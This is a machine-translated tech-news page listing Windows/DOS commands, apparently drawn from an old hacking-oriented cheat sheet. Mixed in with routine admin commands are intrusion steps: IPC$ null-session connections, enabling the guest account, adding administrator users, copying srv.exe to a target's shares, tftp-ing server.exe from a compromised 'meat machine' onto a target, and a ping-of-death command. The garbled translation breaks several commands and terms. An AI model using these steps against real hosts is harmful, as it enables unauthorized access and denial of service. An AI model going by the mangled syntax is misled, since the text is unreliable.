In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-03-26 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Servers >
Share
Shulou(Shulou.com)06/02 Report--
Net view can see all the machines in the local area network, and then you can see it in PING. This method may be stupid, but it is very useful.
Lan dos command set
Net use\ ip\ ipc$ "" / user: "" establish an empty IPC link
Net use\ ip\ ipc$ "password" / user: "user name" to establish an IPC non-empty link
Net use h:\ ip\ c $"password" / user: "user name" is directly logged in and mapped to the other party. C: to the local is H:
Net use h:\ ip\ c$ after login, map the other party C: to the local H:
Net use\ ip\ ipc$ / del remove the IPC link
Net use h: / del removes the mapping from the other party to the local H:
Net user username password / add establish user
Net user g
St / active:yes Activation g
St user
Net user to see which users there are.
Net user account name View the properties of the account
Net localgroup istrators user name / add adds "user" to the administrator to give it administrator privileges. Note: add s to the plural after istrator.
Net start to see which services are enabled
The net start service name enables the service (e.g. net start telnet,net start schedule)
Net stop service name stop a service
Net time\ Target ip to check each other's time
Net time\ Target ip / set sets the local computer time to synchronize with the time of the "target IP" host, plus the parameter / yes to cancel the confirmation message
Net view to see which shares are enabled on the local LAN
Net view\ ip to see which shares are enabled on each other's local area network
Net config display system network settings
Net logoff disconnected sharing
Net pause service name pauses a service
Net send ip "text message" sends messages to each other.
Types and information of network connections in use within the net ver LAN
Net share to view locally opened shares
Net share ipc$ enables ipc$ sharing
Net share ipc$ / del delete ipc$ share
Net share c$ / del delete C: share
Net user g
St 12345 uses g
After logging in, st users change their password to 12345.
Net password password change system login password
Netstat-a to check which ports are open, usually netstat-an
Netstat-n to view the network connection of the port, commonly used netstat-an
Netstat-v to view the work in progress
Netstat-p protocol name example: netstat-p tcq/ip to view a protocol usage (view tcp/ip protocol usage)
Netstat-s to view the usage of all protocols in use
If one of the ports of nbtstat-An ip is open, you can check the user name of the last login of the other party (user name before 03)-Note: parameter-A should be capitalized.
Tracert-the parameter ip (or computer name) tracks the route (packet), and the parameter "- w digit" is used to set the timeout interval.
Ping ip (or domain name) sends data with a default size of 32 bytes to the other host. The parameter: "- l [space] packet size"; "- n times of data sent"; "- t" refers to ping all the time.
Ping-t-l 65550 ip ping of death (sending files greater than 64K and ping all the time becomes the ping of death)
Ipconfig (winipcfg) is used for windows NT and XP (windows 9598) to view the local ip address. The parameter "/ all" available for ipconfig displays all configuration information.
Tlist-t shows the process in a tree line list (an additional tool for the system, which is not installed by default, in the Support/tools folder of the installation directory)
Kill-F process name plus-F parameter to force the termination of a process (an additional tool for the system, which is not installed by default, is in the Support/tools folder of the installation directory)
After adding the-F parameter to the del-F file name, you can delete read-only files. / AR, / AH, / AS, / AA means to delete read-only, hidden, system, and archived files, respectively. / AMUR, / AMUH, / AMUS, / AMUE A means to delete files other than read-only, hidden, system and archive. For example, "DEL/AR." Deletes all read-only files in the current directory, "DEL/A-S." Deletes all files except system files in the current directory
# 2:
Del / S / Q directory or use: rmdir / s / Q directory / S to delete the directory and all subdirectories and files under the directory. At the same time, use the parameter / Q to cancel the deletion operation and delete it directly when the system confirms it. (the two commands have the same effect)
Move drive letter\ path\ File name to be moved path to the mobile file\ after the file name is moved, the prompt to cancel the confirmation that the same file exists in the mobile directory will be directly overwritten with the parameter / y.
Fc one.txt two.txt > 3st.txt compares the two files and outputs the differences to the 3st.txt file. ">" and "> >" are redirect commands.
At id opens a scheduled task that has been registered
At / delete stops all scheduled tasks. With parameter / yes, it stops without confirmation.
At id / delete to stop a registered scheduled task
At views all scheduled tasks
At\ ip time program name (or a command) / r run a program at a certain time and restart the computer
Finger username @ host to see which users have logged in recently
Telnet ip port is far away and login server, default port is 23
Open ip connects to IP (command after telnet login)
Telnet will enter the local telnet by typing telnet directly on the local machine.
Copy path\ file name 1 path\ file name 2 / y copy file 1 to the specified directory as file 2, use the parameter / y to cancel and confirm that you want to rewrite an existing directory file
Copy c:\ srv.exe\ ip*$ copy the local c:\ srv.exe to the other party's * *
Cppy 1st.jpg/b+2st.txt/a 3st.jpg hides the contents of 2st.txt into 1st.jpg to generate a new 3st.jpg file. Note: 2st.txt file header should be blank in three rows, parameter: / b refers to binary file, / a refers to ASCLL format file.
Copy\ ip\ $\ svv.exe c:\ or: copy\ ip*$*. Copy the srv.exe files (all files) under the i$ share of the other party to local C:
The target address of the file or directory tree to be copied by xcopy\ the directory name copies the file and the directory tree, and the same file will not be prompted to overwrite with the parameter / Y
Tftp-I own IP (meat machine IP when using meat machine as springboard) get server.exe c:\ server.exe, download the server.exe of "IP" to the target host c:\ server.exe parameter:-I means to transfer in binary mode, such as when transferring exe files, if you do not add-I, transfer in ASCII mode (transfer text file mode)
After tftp-I IP put c:\ server.exe logs in, upload the local c:\ server.exe to the host
The ftp ip port is used to upload files to the server or perform file operations. The default port is 21. Bin refers to binary transfer (executable file feed); defaults to ASCII format transfer (when text files)
Route print shows IP routes, which will mainly show network address Network addres, subnet mask Netmask, gateway address Gateway addres, interface address Interface
Arp looks at and processes the ARP cache. ARP means name resolution and is responsible for parsing an IP into a physical MAC address. Arp-a will display all the information
Start program name or command / max or / min opens a new window and maximizes (minimizes) running a program or command
Mem to view cpu usage
Attrib file name (directory name) view the properties of a file (directory)
Attrib file name-A-R-S-H or + A + R + S + H removes (adds) the archive, read-only, system, hidden attribute of a file, or adds as an attribute with +
Parameters: / Q shows which user the file and directory belong to, / dir C shows the creation time of the file, / dir A shows the time when the file was last accessed, and / TRAV W was last modified.
Date / t, time / t use this parameter, that is, "DATE/T" and "TIME/T" will only display the current date and time, without having to enter a new date and time
Set specifies the environment variable name = the character to assign to the variable sets the environment variable
Set displays all current environment variables
Set p (or other characters) displays all environment variables that currently begin with the character p (or other characters)
Pause pauses the batch program and displays: press any key to continue.
If performs conditional processing in a batch program (see if commands and variables for more instructions)
The goto tag directs the cmd.exe to the tagged line in the batch program (the label must be on a separate line and begin with a colon, for example: ": start" tag)
Call path\ batch filename calls another batch program from the batch program (see call /? for more instructions)
For executes a specific command on each file in a set of files (see for commands and variables for more instructions)
Echo on or off turns echo on or off. Only use echo without parameters to display the current echo settings.
Echo information displays information on the screen
Echo Information > > pass.txt saves the Information to the pass.txt file
Findstr "Hello" aa.txt looks for the string hello in the aa.txt file
Find a file by find filename
Title title name change CMD window title name
Color color values set the foreground and background colors of the cmd console; 0 = black, 1 = blue, 2 = green, 3 = light green, 4 = red, 5 = purple, 6 = yellow, 7 = white, 8 = gray, 9 = light blue, A = light green, B = light green, C = light red, D = lavender, E = light yellow, F = bright white
Prompt name changes the command prompt displayed by cmd.exe (change C:\, D:\ unified to: EntSky\)
# 3 3:
Ver displays version information under the DOS window
Winver pops up a window showing version information (memory size, system version, patch version, computer name)
Format drive letter / FS: type format disk, type: FAT, FAT32, NTFS, for example: Format D: / FS:NTFS
Md directory name create directory
Directory replacement file for the replace source file to replace the file
Ren original file name new file name rename file name
Tree displays the directory in a tree structure, and the file names in the folder are listed with the parameter-f
The type file name displays the contents of the text file
More file name displays the output file screen by screen
Command = character to be locked by doskey
Doskey to unlock command = lock command provided for DOS (edit the command line, re-invoke the win2k command, and create a macro). For example: lock dir command: doskey dir=entsky (cannot use doskey dir=dir); unlock: doskey dir=
Taskmgr call-up Task Manager
Chkdsk / F D: check disk D and display status report; add parameter / f and fix errors on disk
Tlntadmn telnt service admn, type tlntadmn, select 3, and then select 8, you can change the telnet service default port 23 to any other port
Exit exits the cmd.exe program or currently, using parameter / B exits the current batch script instead of cmd.exe
Path path\ the file name of the executable sets a path for the executable.
Cmd launches a win2K command interpretation window. Parameters: / eff, / en turn off and enable command extension. For more details, please see cmd /?
Regedit / s registry file name is imported into the registry; parameter / S refers to quiet mode import without any prompt
Regedit / e registry file name export registry
The cacls filename parameter displays or modifies a file access control list (ACL) for NTFS format. Parameters: / D user name: set to deny a user access; / P user name: perm to replace the specified user's access rights; / G user name: perm gives the specified user access rights; Perm can be: n none, R read, W write, C change (write), F full control; for example: cacls D:\ test.txt / D p setting d:\ test.txt deny p user access.
Cacls filename View the list of access user permissions for the file
REM text content adds annotations to batch files
Netsh view or change local network configuration
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.